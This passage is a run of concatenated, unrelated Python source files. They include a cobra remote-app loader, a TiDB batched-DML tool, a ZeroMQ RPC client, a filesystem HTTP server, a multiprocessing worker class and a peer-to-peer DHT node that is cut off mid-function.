enabled and cobra driven. All API arguments/returns *must* be
serializable using msgpack.
NOTE: enabling a dcode server means source for local python modules
will be delivered directly to clients over the network!
Running a remote application will also attempt to prefer code from
the server rather than the local python current working directory.
( and uses multiprocessing for import/process isolation )
'''
import os
import sys
import importlib
import subprocess
import multiprocessing
import cobra
import cobra.dcode
class RemoteAppServer:
def __init__(self):
pass
def shareRemoteApp(name, appsrv=None, daemon=None, port=443):
'''
Fire an appropriate dcode enabled cobra daemon and share
the appsrv object with the given name.
'''
    if appsrv is None:
appsrv = RemoteAppServer()
    if daemon is None:
daemon = cobra.CobraDaemon(msgpack=True, port=port)
daemon.fireThread()
cobra.dcode.enableDcodeServer(daemon=daemon)
return daemon.shareObject(appsrv, name)
def getAndRunApp(uri):
    # We don't want our *local* code, we want the remote code.
cwd = os.getcwd()
if cwd in sys.path:
sys.path.remove(cwd)
if '' in sys.path:
sys.path.remove('')
duri = cobra.swapCobraObject(uri, 'DcodeServer')
cobra.dcode.addDcodeUri(duri)
server = cobra.CobraProxy(uri,msgpack=True)
scheme, host, port, name, urlparams = cobra.chopCobraUri( uri )
module = importlib.import_module(name)
if hasattr(module, 'remotemain'):
module.remotemain(server)
else:
module.main()
def runRemoteApp(uri, join=True):
p = multiprocessing.Process(target=getAndRunApp, args=(uri,))
p.start()
if join:
p.join()
def execRemoteApp(uri):
'''
    Exec a remoteapp without using multiprocessing (may be needed if fork()
    causes the child to have an unacceptably dirty environment).
'''
subprocess.Popen([sys.executable, '-m', 'cobra.remoteapp', uri])
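# Illustrative usage sketch (hypothetical module name "myapp"; the URI layout is
# an assumption based on chopCobraUri() above, not taken from cobra's docs):
#
#   server side:  shareRemoteApp('myapp')                        # share on port 443
#   client side:  runRemoteApp('cobra://server-host:443/myapp')
#
# The client process pulls the module named in the URI from the dcode server and
# calls its remotemain(server) entry point (or main() if remotemain is absent).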
def main():
runRemoteApp(sys.argv[1])
if __name__ == '__main__':
sys.exit(main())
|
tk_dml.py
|
# coding=utf-8
# @Time: 2021/8/20 14:38
# @Author: [email protected]
"""
Usage:
支持以下几种大批量DML语句:
delete from <t> where <...>
update <t> set <...> where <...>
insert into <t_to> select <...> from <t_from> where <...>
默认使用_tidb_rowid(或数字主键)作为拆分列,不支持设置了SHARD_ROW_ID_BITS或auto_random的表
依据_tidb_rowid和batch_size和将SQL拆分为多个batch,并发max_workers个batch
"""
import argparse
import toml
from concurrent.futures import ThreadPoolExecutor
from datetime import datetime
from queue import Queue, Empty
from threading import Thread
from time import sleep
from traceback import format_exc
import pymysql
import sqlparse
import sqlparse.tokens as T
from utils.logger import FileLogger
# Global Constants
SUPPORTED_SQL_TYPES = ["DELETE", "UPDATE", "INSERT"]
def argParse():
parser = argparse.ArgumentParser(description="TiDB Massive DML Tool.")
parser.add_argument("-f", dest="config", type=str, required=True, help="config file")
parser.add_argument("-l", dest="log", type=str, help="Log File Name, Default <host>.log.<now>")
args = parser.parse_args()
return args
class Config(object):
def __init__(self, config_file, log_file=None):
# toml config file
self.config_file = config_file
# log file
self.log_file = log_file
# db connection info
self.host, self.port, self.user, self.password, self.db = None, None, None, None, None
# sql split info
self.table, self.sql, self.start_rowid, self.end_rowid, self.batch_size = None, None, None, None, None
# execute info
self.max_workers, self.execute = None, None
def parse(self):
with open(self.config_file, encoding='utf8') as f:
config = toml.load(f)
self.host = config["basic"]["host"]
self.port = config["basic"]["port"]
self.user = config["basic"]["user"]
self.password = config["basic"]["password"]
self.db = config["dml"]["db"]
self.table = config["dml"]["table"]
self.sql = config["dml"]["sql"]
self.start_rowid = config["dml"].get("start_rowid", None)
self.end_rowid = config["dml"].get("end_rowid", None)
self.batch_size = config["dml"].get("batch_size", 1000)
self.max_workers = config["dml"].get("max_workers", 50)
self.execute = config["dml"].get("execute", False)
if self.log_file is None:
            self.log_file = f"{self.host}.log.{datetime.now().strftime('%Y-%m-%dT%H:%M:%S')}"
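# Illustrative config file for Config.parse() above (all values are placeholders;
# only the keys the parser reads are shown, optional ones with their defaults):
#
#   [basic]
#   host = "127.0.0.1"
#   port = 4000
#   user = "root"
#   password = ""
#
#   [dml]
#   db = "test"
#   table = "sbtest1"
#   sql = "delete from sbtest1 where pad = ''"
#   # start_rowid / end_rowid default to the table's min/max rowid
#   batch_size = 1000
#   max_workers = 50
#   execute = false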
class MySQLConnectionPool(object):
def __init__(self, host=None, port=None, user=None, password=None, db=None, pool_size=5):
self.host = host
self.port: int = port
self.user = user
self.password = password
self.db = db
self.pool_size = pool_size
self.pool: Queue = Queue(maxsize=self.pool_size)
def init(self):
logger.info("Initializing MySQL Connection Pool...")
for i in range(self.pool_size):
try:
conn = pymysql.connect(host=self.host, port=self.port, user=self.user, password=self.password,
database=self.db, charset="utf8mb4")
conn.autocommit(True)
self.pool.put(conn)
except Exception as e:
                logger.fatal("Failed to create MySQL connection, please check database connectivity! Exiting!\n%s", e)
raise e
logger.info("Initializing MySQL Connection Pool Finished...")
def close(self):
logger.info("Closing MySQL Connection Pool...")
for i in range(self.pool_size):
try:
conn: pymysql.Connection = self.pool.get(timeout=5)
conn.close()
except Empty:
logger.info("Connection Pool is empty, exit...")
return
except Exception as e:
logger.info(f"Connection Pool close with Exception: {e}")
logger.info("Closing MySQL Connection Pool Finished...")
def get(self):
return self.pool.get()
def put(self, conn: pymysql.Connection):
self.pool.put(conn)
def start_monitor(self):
        # Start a daemon thread to monitor the connection pool size
def report_size():
while True:
logger.info(f"ConnectionPool Monitor: Size {self.pool.qsize()}")
sleep(10)
thd = Thread(target=report_size, daemon=True)
thd.start()
# Table on which the batch division is based
class Table(object):
def __init__(self, table_name=None, db=None, conn=None):
self.name = table_name
self.db = db
self.conn: pymysql.Connection = conn
self.rowid = None
self.rowid_min = None
self.rowid_max = None
self.is_rowid_sharded = False
def load(self):
logger.info(f"Loading Table Info of {self.db}.{self.name} ...")
with self.conn.cursor() as c:
sql = f"select COLUMN_NAME,DATA_TYPE from information_schema.COLUMNS where table_schema='{self.db}' " \
f"and table_name='{self.name}' and COLUMN_KEY='PRI';"
c.execute(sql)
pri_info = c.fetchall()
            if len(pri_info) == 1 and pri_info[0][1] in ('int', 'bigint'):  # without a primary key, rowid is still _tidb_rowid
self.rowid = pri_info[0][0]
else:
self.rowid = "_tidb_rowid"
sql = f"select TIDB_ROW_ID_SHARDING_INFO from information_schema.TABLES where TABLE_SCHEMA='{self.db}' " \
f"and TABLE_NAME='{self.name}'"
try:
c.execute(sql)
rowid_shard_info = c.fetchone()[0]
if not rowid_shard_info.startswith("NOT_SHARDED"):
self.is_rowid_sharded = True
except Exception as e:
if e.args[0] == 1054:
print("Warning: TiDB version <=4.0.0, Please check if Rowid was sharded before execution!")
pass
# 小于4.0的版本没有TIDB_ROW_ID_SHARDING_INFO字段,因此打印一句警告,提示需要注意rowid是否分片
else:
raise e
sql = f"select min({self.rowid}),max({self.rowid}) from {self.db}.{self.name};"
c.execute(sql)
self.rowid_min, self.rowid_max = c.fetchone()
logger.info(f"Load Table Info of {self.db}.{self.name} Done.")
class SQLOperator(object):
def __init__(self, pool: MySQLConnectionPool = None, table: Table = None, sql=None, batch_size=None,
max_workers=None, start_rowid=None, end_rowid=None, execute=None):
self.table: Table = table
self.sql = sql
self.batch_size = batch_size
self.max_workers = max_workers
self.start_rowid = int(start_rowid) if start_rowid else self.table.rowid_min
self.end_rowid = int(end_rowid) if end_rowid else self.table.rowid_max
self.execute = execute
        self.connection_pool: MySQLConnectionPool = pool
def validate(self):
logger.info("Validating SQL Start...")
"""
格式化SQL:
1.通过sqlparse.format进行空格与缩进符的标准化
2.不支持DML以外的SQL类型
3.不支持未包含where条件的SQL
4.不支持设置了SHARD_ROW_ID_BITS或者auto_random的表
"""
# 1
self.sql = sqlparse.format(self.sql, reindent_aligned=True, use_space_around_operators=True,
keyword_case="upper")
logger.info(f"SQL will be batched: \n{self.sql}")
# 2
parsed_sql = sqlparse.parse(self.sql)[0]
sql_type = parsed_sql.get_type()
if sql_type not in SUPPORTED_SQL_TYPES:
raise Exception(f"Unsupported SQL type: {sql_type}!")
# 3
sql_tokens = parsed_sql.tokens
where_token = list(filter(lambda token: isinstance(token, sqlparse.sql.Where), sql_tokens))
if len(where_token) == 0:
raise Exception("No where condition in SQL(try where 1=1), exit...")
# 4
if self.table.is_rowid_sharded:
raise Exception(f"Table {self.table.name} was set SHARD_ROW_ID_BITS or AUTO_RANDOM! exit...")
logger.info(f"Rowid [{self.table.rowid}] will be used for batching.")
logger.info("Validating SQL Done...")
def run(self):
thread_count = (self.end_rowid - self.start_rowid) // self.batch_size + 1
logger.info(f"Max Thread Count: {thread_count}, Rowid Range [{self.start_rowid},{self.end_rowid}]")
if not self.execute:
            # When not actually executing (dry run), run only one batch to print a sample SQL:
with ThreadPoolExecutor(max_workers=1) as pool:
pool.submit(self.__run_batch,
self.start_rowid,
self.start_rowid + self.batch_size,
1,
thread_count)
else:
            i = 0  # Release the ThreadPoolExecutor every 1000 batches; accumulating too many futures objects would exhaust memory
while i < thread_count:
with ThreadPoolExecutor(max_workers=self.max_workers) as pool:
                    for j in range(i, min(i + 1000, thread_count)):
pool.submit(self.__run_batch,
self.start_rowid + (j * self.batch_size),
self.start_rowid + ((j + 1) * self.batch_size),
j + 1,
thread_count)
i += 1000
def __run_batch(self, start: int, stop: int, batch_id, max_batch_id):
try:
            # pymysql does not support prepared statements, so each thread builds its own SQL string
sql_tokens = sqlparse.parse(self.sql)[0].tokens
sql_tokens = list(filter(lambda token: token.ttype not in (T.Whitespace, T.Newline), sql_tokens))
rowid_condition = "WHERE {0}.{1} >= {2} AND {0}.{1} < {3} AND".format(self.table.name, self.table.rowid,
start, stop)
for i in range(len(sql_tokens)):
if isinstance(sql_tokens[i], sqlparse.sql.Where):
sql_tokens[i].value = sql_tokens[i].value.replace("WHERE", rowid_condition)
break
sql_token_values = list(map(lambda token: token.value, sql_tokens))
batch_sql = ' '.join(sql_token_values)
except Exception as e:
logger.error(f"Batch {batch_id} failed with exeception {e}, exit... Exception:\n {format_exc()}")
raise
if self.execute:
            conn = self.connection_pool.get()
try:
start_time = datetime.now()
with conn.cursor() as c:
affected_rows = c.execute(batch_sql)
conn.commit()
end_time = datetime.now()
logger.info(f"Batch {batch_id} of {max_batch_id} OK, {affected_rows} Rows Affected ("
f"{end_time - start_time}).\nSQL: {batch_sql}")
except Exception as e:
logger.error(f"Batch {batch_id} of {max_batch_id} Failed: {e}, Exception:\n {format_exc()}")
raise
finally:
if conn:
                    self.connection_pool.put(conn)
else:
logger.info(f"Batch {batch_id} of {max_batch_id} Dry Run:\nSQL: {batch_sql}")
if __name__ == '__main__':
args = argParse()
config_file, log_file = args.config, args.log
conf = Config(config_file=config_file, log_file=log_file)
conf.parse()
logger = FileLogger(filename=conf.log_file)
print(f"See logs in {conf.log_file} ...")
# create connection pool
pool = MySQLConnectionPool(host=conf.host, port=int(conf.port), user=conf.user, password=conf.password,
db=conf.db, pool_size=conf.max_workers * 2)
pool.init()
pool.start_monitor()
# load table info
conn = pool.get()
table = Table(table_name=conf.table, db=conf.db, conn=conn)
table.load()
pool.put(conn)
# start sql operator
operator = SQLOperator(pool=pool, table=table, sql=conf.sql, batch_size=conf.batch_size, execute=conf.execute,
max_workers=conf.max_workers, start_rowid=conf.start_rowid, end_rowid=conf.end_rowid)
operator.validate()
operator.run()
# close connection pool
pool.close()
|
client.py
|
# -*- encoding: utf-8 -*-
"""
@File :client.py
@Desc :RPC client
@Date :2022-03-03 10:42
"""
import threading
from datetime import datetime
from functools import lru_cache
import zmq
from zmq.auth.thread import ThreadAuthenticator
from .exception import RemoteException
from .constant import KEEP_ALIVE_TOPIC,KEEP_ALIVE_TOLERANCE
class RpcClient:
def __init__(self):
self.__context = zmq.Context()
self.__socket_req = self.__context.socket(zmq.REQ)
self.__socket_req.setsockopt(zmq.LINGER, 0)
#self.__poller = zmq.Poller()
#self.__poller.register(self.__socket_req, zmq.POLLIN)
self.__socket_sub = self.__context.socket(zmq.SUB)
self.__active = False
self.__thread = None
self.__lock = threading.Lock()
        self.__authenticator = None  # Authenticator used to ensure data security
self._last_received_ping = str(datetime.utcnow())
@lru_cache(100)
def __getattr__(self, name):
def dorpc(*args, **kwargs):
timeout = kwargs.pop('timeout',0)
req = [name, args, kwargs]
rep = None
with self.__lock:
self.__socket_req.send_json(req)
if not timeout or self.__socket_req.poll(timeout):
rep = self.__socket_req.recv_json()
if not rep:
raise TimeoutError('RpcServer no response in {} second(s)'.format(timeout/1000.0))
elif rep[0]:
return rep[1]
else:
raise RemoteException(rep[1])
return dorpc
def start(self, req_address, sub_address="", client_secretkey_path = "", server_publickey_path = ""):
if self.__active:
return
# Start authenticator
if client_secretkey_path and server_publickey_path:
self.__authenticator = ThreadAuthenticator(self.__context)
self.__authenticator.start()
self.__authenticator.configure_curve(
domain="*",
location=zmq.auth.CURVE_ALLOW_ANY
)
publickey, secretkey = zmq.auth.load_certificate(client_secretkey_path)
serverkey, _ = zmq.auth.load_certificate(server_publickey_path)
self.__socket_sub.curve_secretkey = secretkey
self.__socket_sub.curve_publickey = publickey
self.__socket_sub.curve_serverkey = serverkey
self.__socket_req.curve_secretkey = secretkey
self.__socket_req.curve_publickey = publickey
self.__socket_req.curve_serverkey = serverkey
self.__socket_req.connect(req_address)
if sub_address:
self.__active = True
self.__socket_sub.connect(sub_address)
self.__thread = threading.Thread(target=self.run)
self.__thread.start()
self._last_received_ping = str(datetime.utcnow())
self.subscribe_topic(KEEP_ALIVE_TOPIC)
def stop(self):
if not self.__active:
return
self.__active = False
def join(self):
# Wait for RpcClient thread to exit
if self.__thread and self.__thread.is_alive():
self.__thread.join()
self.__thread = None
def run(self):
pull_tolerance = int(KEEP_ALIVE_TOLERANCE.total_seconds() * 1000)
while self.__active:
if not self.__socket_sub.poll(pull_tolerance):
self._on_unexpected_disconnected()
continue
# Receive data from subscribe socket
            topic, data = self.__socket_sub.recv_json(flags=zmq.NOBLOCK)
if topic == KEEP_ALIVE_TOPIC:
#print("{} beat {}".format(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime()), data))
self._last_received_ping = data
else:
# Process data by callable function
self.callback(topic, data)
# Close socket
self.__socket_req.close()
self.__socket_sub.close()
@staticmethod
def _on_unexpected_disconnected():
print("RpcServer has no response over {tolerance} seconds, please check you connection."
.format(tolerance=KEEP_ALIVE_TOLERANCE.total_seconds()))
def callback(self, topic, data):
raise NotImplementedError
def subscribe_topic(self, topic):
self.__socket_sub.setsockopt_string(zmq.SUBSCRIBE, u'["{}"'.format(topic))
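# A minimal usage sketch (hypothetical addresses and remote method name; a
# subclass only has to implement callback() to consume published topics):
#
#   class PrintingClient(RpcClient):
#       def callback(self, topic, data):
#           print(topic, data)
#
#   client = PrintingClient()
#   client.start("tcp://127.0.0.1:2014", "tcp://127.0.0.1:4102")
#   result = client.some_remote_method(1, 2, timeout=3000)  # proxied via __getattr__
#   client.stop()
#   client.join()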
|
clients.py
|
import os
import psutil
import requests
import threading
from wafec_wrapt_custom.utility import fullname
base_url = os.environ.get('WWC_URL')
base_url = base_url if base_url else 'http://localhost:6543'
def _safe_run(target, args, kwargs):
try:
target(*args, **kwargs)
    except Exception:
pass
def _post_async(*args, **kwargs):
thread = threading.Thread(target=_safe_run, args=(requests.post, args, kwargs))
thread.start()
def add_proxy_interception_info(name, x=None, trace=None):
p = psutil.Process()
ps = p.name()
data = {'ps': ps, 'name': name, 'x': fullname(x), 'trace': trace}
_post_async(url=f'{base_url}/api/proxy/interception/add', json=data)
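# Illustrative call (hypothetical names): records an interception event by posting
# asynchronously to {WWC_URL}/api/proxy/interception/add.
#
#   add_proxy_interception_info("nova.compute.api.create", x=some_wrapped_obj)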
|
http.py
|
__all__ = ["serve_fs"]
import SimpleHTTPServer
import SocketServer
from fs.path import pathjoin, dirname
from fs.errors import FSError
from time import mktime
from cStringIO import StringIO
import cgi
import urllib
import posixpath
import time
import threading
import socket
def _datetime_to_epoch(d):
return mktime(d.timetuple())
class FSHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""A hacked together version of SimpleHTTPRequestHandler"""
def __init__(self, fs, request, client_address, server):
self._fs = fs
SimpleHTTPServer.SimpleHTTPRequestHandler.__init__(self, request, client_address, server)
def do_GET(self):
"""Serve a GET request."""
f = None
try:
f = self.send_head()
if f:
try:
self.copyfile(f, self.wfile)
except socket.error:
pass
finally:
if f is not None:
f.close()
def send_head(self):
"""Common code for GET and HEAD commands.
This sends the response code and MIME headers.
Return value is either a file object (which has to be copied
to the outputfile by the caller unless the command was HEAD,
and must be closed by the caller under all circumstances), or
None, in which case the caller has nothing further to do.
"""
path = self.translate_path(self.path)
f = None
if self._fs.isdir(path):
if not self.path.endswith('/'):
# redirect browser - doing basically what apache does
self.send_response(301)
self.send_header("Location", self.path + "/")
self.end_headers()
return None
for index in ("index.html", "index.htm"):
index = pathjoin(path, index)
if self._fs.exists(index):
path = index
break
else:
return self.list_directory(path)
ctype = self.guess_type(path)
try:
info = self._fs.getinfo(path)
f = self._fs.open(path, 'rb')
except FSError, e:
self.send_error(404, str(e))
return None
self.send_response(200)
self.send_header("Content-type", ctype)
self.send_header("Content-Length", str(info['size']))
if 'modified_time' in info:
self.send_header("Last-Modified", self.date_time_string(_datetime_to_epoch(info['modified_time'])))
self.end_headers()
return f
def list_directory(self, path):
"""Helper to produce a directory listing (absent index.html).
Return value is either a file object, or None (indicating an
error). In either case, the headers are sent, making the
interface the same as for send_head().
"""
try:
dir_paths = self._fs.listdir(path, dirs_only=True)
file_paths = self._fs.listdir(path, files_only=True)
except FSError:
self.send_error(404, "No permission to list directory")
return None
paths = [p+'/' for p in sorted(dir_paths, key=lambda p:p.lower())] + sorted(file_paths, key=lambda p:p.lower())
#list.sort(key=lambda a: a.lower())
f = StringIO()
displaypath = cgi.escape(urllib.unquote(self.path))
f.write('<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">')
f.write("<html>\n<title>Directory listing for %s</title>\n" % displaypath)
f.write("<body>\n<h2>Directory listing for %s</h2>\n" % displaypath)
f.write("<hr>\n<ul>\n")
parent = dirname(path)
if path != parent:
f.write('<li><a href="%s">../</a></li>' % urllib.quote(parent.rstrip('/') + '/'))
for path in paths:
f.write('<li><a href="%s">%s</a>\n'
% (urllib.quote(path), cgi.escape(path)))
f.write("</ul>\n<hr>\n</body>\n</html>\n")
length = f.tell()
f.seek(0)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-Length", str(length))
self.end_headers()
return f
def translate_path(self, path):
# abandon query parameters
path = path.split('?',1)[0]
path = path.split('#',1)[0]
path = posixpath.normpath(urllib.unquote(path))
return path
def serve_fs(fs, address='', port=8000):
"""Serve an FS instance over http
:param fs: an FS object
:param address: IP address to serve on
:param port: port number
"""
def Handler(request, client_address, server):
return FSHTTPRequestHandler(fs, request, client_address, server)
#class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
# pass
httpd = SocketServer.TCPServer((address, port), Handler, bind_and_activate=False)
#httpd = ThreadedTCPServer((address, port), Handler, bind_and_activate=False)
httpd.allow_reuse_address = True
httpd.server_bind()
httpd.server_activate()
server_thread = threading.Thread(target=httpd.serve_forever)
server_thread.start()
try:
while True:
time.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
httpd.shutdown()
if __name__ == "__main__":
from fs.osfs import OSFS
serve_fs(OSFS('~/'))
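    # Editor's sketch (hedged): serve_fs works with any FS object from the same
    # `fs` package, e.g. an in-memory filesystem on a non-default port. MemoryFS
    # and setcontents() are assumptions based on the pyfilesystem 0.x API this
    # module already targets; uncomment to try.
    #from fs.memoryfs import MemoryFS
    #mem_fs = MemoryFS()
    #mem_fs.setcontents('hello.txt', 'served from memory')
    #serve_fs(mem_fs, address='127.0.0.1', port=8080)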
|
worker.py
|
import multiprocessing as mp
from abc import ABC, abstractmethod
class Worker(ABC):
"""
A generic worker class to implement other class based functionalities using
multi-processing
"""
@abstractmethod
def main(self):
# This function has to be implemented by the base class
pass
@property
@abstractmethod
def name(self):
# This property will return the name of the base class
# return "BaseClassName"
pass
def run(self):
# This function starts the main method for this worker after setting up the queues
        # for communication
self.inputs = mp.Queue()
self.outputs = mp.Queue()
self.proc = mp.Process(target=self.main)
self.proc.start()
def stop(self):
# This function will kill the process
self.inputs.put(0)
# print("%s: Inputs(%s) Outputs(%s)" %(self.name(), self.inputs.empty(), self.outputs.empty()))
self.proc.join()
print("%s killed with code %s" %(self.name(), str(self.proc.exitcode)))
def get_output(self):
# This function reads and returns from the output queue
return None if self.outputs.empty() else self.outputs.get()
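# Editor's sketch (hedged): a minimal concrete Worker showing the intended
# pattern -- read from self.inputs, write to self.outputs, and exit when stop()
# pushes the 0 sentinel. EchoWorker and the __main__ demo are illustrative
# additions, not part of the original module.
class EchoWorker(Worker):
    @property
    def name(self):
        return "EchoWorker"
    def main(self):
        # Echo every queued item back until the 0 sentinel arrives.
        while True:
            item = self.inputs.get()
            if item == 0:
                break
            self.outputs.put(item)
if __name__ == "__main__":
    worker = EchoWorker()
    worker.run()
    worker.inputs.put("hello")
    worker.stop()               # sends the sentinel and joins the process
    print(worker.get_output())  # expected: 'hello' (None if the queue is empty)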
|
main.py
|
import sys
import threading
import time
from socket import *
class Peer():
def __init__(self):
super().__init__()
self.client_socket_udp = socket(AF_INET, SOCK_DGRAM)
self.server_socket_udp = socket(AF_INET, SOCK_DGRAM)
self.server_socket_tcp = socket(AF_INET, SOCK_STREAM)
self.udp_server_thread = threading.Thread(target=self.server_handler_udp)
self.tcp_server_thread = threading.Thread(target=self.server_handler_tcp)
self.client_thread = threading.Thread(target=self.client_handler)
self.input_thread = threading.Thread(target=self.read_input)
self.kill_thread = False
def initialise(self, peer, first_successor, second_successor, ping_interval, threads):
# Initialise the peer by setting up its successors and starting threads for servers and client
self.peer = int(peer)
self.first_successor = int(first_successor)
self.second_successor = int(second_successor)
print("My new first successor is Peer {}".format(self.first_successor))
print("My new second successor is Peer {}".format(self.second_successor))
self.ping_interval = int(ping_interval)
self.start_threads(threads)
self.files = []
return
def start_threads(self, threads):
# Start UDP server and client and TCP server on threads
if threads=="server" or threads=="all":
self.tcp_server_thread.start()
self.udp_server_thread.start()
self.input_thread.start()
if threads=="client" or threads=="all":
time.sleep(1)
self.client_thread.start()
return
def stop_threads(self):
# Stop the threads that are running
self.kill_thread = True
self.server_socket_udp.close()
self.server_socket_tcp.close()
print("UDP Server closed")
print("TCP Server closed")
return
def server_handler_udp(self):
# UDP Server thread function.
self.server_socket_udp.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.server_socket_udp.bind(("localhost", self.peer+12000))
print('UDP Server is ready for service')
while True and not self.kill_thread:
message, clientAddress = self.server_socket_udp.recvfrom(2048)
message = message.decode()
# print(message)
print('Ping request message received from Peer', message)
if message:
server_message = str(self.peer)
self.server_socket_udp.sendto(server_message.encode(), clientAddress)
self.server_socket_udp.close()
print("UDP Server closed")
return
def client_handler(self):
# UDP Client thread function.
message = str(self.peer)
heartbeat = {
self.first_successor: 0,
self.second_successor: 0
}
while True and not self.kill_thread:
print('Ping requests sent to Peers {} and {}'.format(self.first_successor, self.second_successor))
successors = [self.first_successor, self.second_successor]
heartbeat = {k:v for k,v in heartbeat.items() if k in successors}
for peer in successors:
if peer not in heartbeat:
heartbeat[peer] = 0
try:
self.client_socket_udp.settimeout(2)
# Heartbeat of Successors
self.client_socket_udp.sendto(message.encode(),("localhost", int(peer)+12000))
#wait for the reply from the server
receivedMessage, addr = self.client_socket_udp.recvfrom(2048)
receivedMessage = receivedMessage.decode()
print("Ping response received from Peer {}".format(peer))
heartbeat[peer] = 0
except timeout:
print("Heartbeat missing with Peer {}".format(peer))
heartbeat[peer] += 1
print(heartbeat)
if heartbeat[peer]>2:
self.remove_abrupt(peer)
time.sleep(self.ping_interval)
self.client_socket_udp.close()
print("UDP Client closed")
return
def server_handler_tcp(self):
# TCP Server function.
self.server_socket_tcp.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
self.server_socket_tcp.bind(('localhost', self.peer+12000))
self.server_socket_tcp.listen(5)
print('TCP Server is ready for service at {}'.format(self.peer+12000))
while True and not self.kill_thread:
conn, addr = self.server_socket_tcp.accept()
message, clientAddress = conn.recvfrom(2048)
#received data from the client, now we know who we are talking with
message = message.decode()
# print('TCP ping request received from Peer {}'.format(conn))
reply = self.process_tcp_request(message)
if reply:
conn.send(reply.encode())
conn.close()
self.server_socket_tcp.close()
print("TCP Server closed")
return
def process_tcp_request(self, message):
# Process the TCP request
decoded_message = message.split()
message_action = decoded_message[0]
# message_info = int(decoded_message[1])
reply = ""
if message_action=="join":
print("Peer {} Join request received".format(int(decoded_message[1])))
self.join_peer(int(decoded_message[1]))
elif message_action=="change":
self.change_successor(int(decoded_message[1]), int(decoded_message[2]), message)
elif message_action=="remove":
self.remove_successor(int(decoded_message[1]), int(decoded_message[2]), int(decoded_message[3]), message)
elif message_action=="Accepted":
self.initialise(self.peer, int(decoded_message[1]), int(decoded_message[2]), self.ping_interval, "client")
elif message_action=="store":
self.store_file(int(decoded_message[1]), decoded_message[2])
elif message_action=="get_successor":
reply = self.get_successor(int(decoded_message[1]))
elif message_action=="request":
reply = self.request_file(int(decoded_message[1]), decoded_message[2])
elif message_action=="get":
reply = self.get_file(decoded_message[1])
else:
print("File received")
self.save_received_file(message)
return reply
def tcp_request(self, dest, message):
# Function to send a message to destination (dest) over TCP. Returns the message received.
tcp_socket = socket(AF_INET, SOCK_STREAM)
tcp_socket.connect(("localhost", dest+12000))
tcp_socket.sendall(message.encode())
# wait for the reply from the server
receivedMessage = tcp_socket.recv(2048)
receivedMessage = receivedMessage.decode()
tcp_socket.close()
return receivedMessage
def join_request(self, peer, known_peer, ping_interval):
# Initial request by a new peer to join DHT.
self.peer = int(peer)
self.ping_interval = int(ping_interval)
tcp_socket = socket(AF_INET, SOCK_STREAM)
self.start_threads("server")
message = "join {}".format(peer)
receivedMessage = self.tcp_request(known_peer, message)
# receivedMessage = receivedMessage.split()
# if receivedMessage[0]=="Accepted":
# self.initialise(peer, receivedMessage[1], receivedMessage[2], ping_interval)
# print("My new first successor is Peer {}".format(self.first_successor))
# print("My new second successor is Peer {}".format(self.second_successor))
# else:
# print("Connection refused")
return
def join_peer(self, new_peer):
# Checks where the peer has to be added or the request to add peer should be sent.
# last node, add to current peer itself
if self.peer > self.first_successor:
self.add_peer(new_peer)
# first successor is the last, add to first successor
elif self.second_successor < self.first_successor and new_peer > self.first_successor:
print("Peer {} Join request forwarded to my successor {}".format(new_peer, self.first_successor))
message = "join {}".format(new_peer)
self.tcp_request(self.first_successor, message)
# first successor is the last, add to current peer
elif self.second_successor < self.first_successor and new_peer > self.peer:
self.add_peer(new_peer)
# send request to second
elif new_peer > self.second_successor:
print("Peer {} Join request forwarded to my successor {}".format(new_peer, self.second_successor))
message = "join {}".format(new_peer)
self.tcp_request(self.second_successor, message)
# send request to first, add to first successor
elif new_peer > self.first_successor:
print("Peer {} Join request forwarded to my successor {}".format(new_peer, self.first_successor))
message = "join {}".format(new_peer)
self.tcp_request(self.first_successor, message)
# add to current peer
else:
self.add_peer(new_peer)
return
def add_peer(self, new_peer):
# Add peer as a successor to current peer.
# successor change of predecessor
message = "change {} {}".format(self.peer, new_peer)
self.tcp_request(self.second_successor, message)
# Inform peer that it is accepted into DHT
message = "Accepted {} {}".format(self.first_successor, self.second_successor)
self.tcp_request(new_peer, message)
print("My new first successor is Peer {}".format(new_peer))
print("My new second successor is Peer {}".format(self.first_successor))
self.second_successor = self.first_successor
self.first_successor = new_peer
self.transfer_files("join")
return
def change_successor(self, source_peer, new_successor, message):
# Changes the successor of the peer. Happens when a new peer joins the DHT.
if self.first_successor == source_peer:
print("Successor Change request received")
self.second_successor = new_successor
print("My new first successor is Peer {}".format(self.first_successor))
print("My new second successor is Peer {}".format(self.second_successor))
elif self.second_successor == source_peer:
self.tcp_request(self.first_successor, message)
else:
self.tcp_request(self.second_successor, message)
return
def read_input(self):
# Read user inputs from command line in real-time
while True:
command = input()
command = command.split()
exit_list = ["Quit", "quit", "Exit", "exit", "Close", "close"]
if not command:
continue
            if command[0] in exit_list:
                print("exiting...\n")
                self.remove_graceful()
                print("Exit successful")
                break
elif command[0].lower()=="store":
print("storing file...\n")
message = "store {} {}".format(self.peer, command[1])
print("File Store {} request forward to my first successor".format(command[1]))
self.tcp_request(self.first_successor, message)
elif command[0].lower()=="request":
print("retreiving file...\n")
self.request_file(self.peer, command[1])
else:
print("Yeah.")
return
    def get_successor(self, successor):
        # Return the required successor
        if successor == 1:
            reply = self.first_successor
        else:
            reply = self.second_successor
        return str(reply)
def remove_successor(self, gone_peer, new_first_successor, new_second_successor, message):
# Check if successor change due to peer departure is required
# Transfer message forward otherwise
if self.first_successor == gone_peer:
self.first_successor = new_first_successor
self.second_successor = new_second_successor
print("Peer {} will depart from the network".format(gone_peer))
print("My new first successor is Peer {}".format(self.first_successor))
print("My new second successor is Peer {}".format(self.second_successor))
elif self.second_successor == gone_peer:
self.second_successor = new_first_successor
print("Peer {} will depart from the network".format(gone_peer))
print("My new first successor is Peer {}".format(self.first_successor))
print("My new second successor is Peer {}".format(self.second_successor))
self.tcp_request(self.first_successor, message)
else:
self.tcp_request(self.first_successor, message)
return
def remove_graceful(self):
# Peer departs gracefully
message = "remove {} {} {}".format(self.peer, self.first_successor, self.second_successor)
self.tcp_request(self.first_successor, message)
self.transfer_files("leave")
self.stop_threads()
return
def remove_abrupt(self, peer):
# Remove a successor with no heartbeat
print("Peer {} is no longer alive".format(peer))
if peer == self.first_successor:
self.first_successor = self.second_successor
message = "get_successor 1"
            received_message = self.tcp_request(self.first_successor, message)
